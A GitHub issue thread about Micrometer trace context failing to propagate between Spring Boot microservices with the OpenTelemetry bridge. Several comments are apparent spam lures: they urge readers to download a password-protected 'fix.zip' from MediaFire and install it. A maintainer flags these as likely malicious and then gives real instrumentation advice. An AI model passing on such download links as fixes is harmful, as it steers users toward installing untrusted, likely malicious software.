### ISSUE TITLE
Context not propagated in a reactive programming, OpenTelemetry context is not available

### ISSUE THREAD

**Issue by tadlakha9** [micrometer-metrics/tracing#826]
We are facing an issue with spring boot 3.3.1, TraceContext is not propagated while calling one microservice with another via retrofit.

java.lang.NullPointerException: Cannot invoke "io.micrometer.tracing.Span.context()" because the return value of "io.micrometer.tracing.Tracer.currentSpan()" is null

**Our Observation**

When we call an api in microservice 1, tracer.currentSpan().context() is available after calling another microservice via retrofit, TraceContext would not get propagated and a new context with new traceId would get started.

Complete flow working fine with `bridge brave` but facing issue with `bridge otel`.

Sample projects

https://github.com/tadlakha9/micro1
https://github.com/tadlakha9/micro2

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tadlakha9** [comment]
I don't understand how the installation of above files would solve my issue, as i mentioned its working fine while using the bridge brave but not with bridge otel

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by shakuzen** [comment]
@tadlakha9 I believe GitHub is having a problem with spam bots posting links to download and install potentially malicious software on issues across GitHub. It looks like the comments and users have been removed by GitHub now.

**Comment by shakuzen** [comment]
I took a quick look at your sample project. It looks like there's a lot of extra config that you probably don't need if you're using Spring Boot's auto-config and Micrometer. For Retrofit instrumentation, you can pass an OkHttpClient that is instrumented to the Retrofit builder - see where we do that in our tests [here](https://github.com/micrometer-metrics/micrometer/pull/4041/files#diff-a2dc30c0ef9524626b4d44b12c142a389483f95c60a6ba8cb3078c779aa58bc9). You can see some documentation about OkHttpClient instrumentation [here](https://docs.micrometer.io/micrometer/reference/reference/okhttpclient.html). Try updating the sample projects to minimally do that without the other config and let us know if that works.

**Comment by tadlakha9** [comment]
The issue is on my side, which was corrected now, thanks for you support.
